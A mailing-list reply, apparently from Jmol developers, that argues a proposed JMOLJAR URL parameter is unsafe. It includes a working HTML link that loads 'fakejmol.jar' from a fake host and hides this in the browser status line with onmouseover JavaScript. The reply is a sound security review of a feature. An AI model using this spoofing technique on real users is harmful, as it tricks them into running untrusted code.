Quoting Robert Hanson <[EMAIL PROTECTED]>:

> that's why I'm asking. Yes, I have tried this. We could make it only the
> applet from the server -- in other words not allow a new codebase -- if you
> think that is a major concern.
>
> How would you see the spoof working, Rolf?

The HTML code shown below just hides the 'JMOLJAR=...' extension
within the status line. Althugh my Firefox 3 does show the real URL,
even when I exceptionally allow status line changes, it still works
with my Internet Eplorer 7. And this is just the most simple way.
There are more sophisticated techniques possible.

<a
href="http://www.imb-jena.de/cgi-bin/3d_mapping.pl?CODE=1deh&MODE=biological1&JMOLJAR=http://www.fakejenalib.com/fakejmol.jar";
 onmouseout="window.status='';return true"
onmouseover="window.status='http://www.imb-jena.de/cgi-bin/3d_mapping.pl?CODE=1deh&MODE=biological1';return
 true">JenaLib Jmol
Viewer</a>

Since it may be possible that the complete version is only shown as
links here is a (modified) repeat of the Javascript portion:

onmouseout="window.status='';return true"
onmouseover="window.status='original_URL';return true"

Regards,
Rolf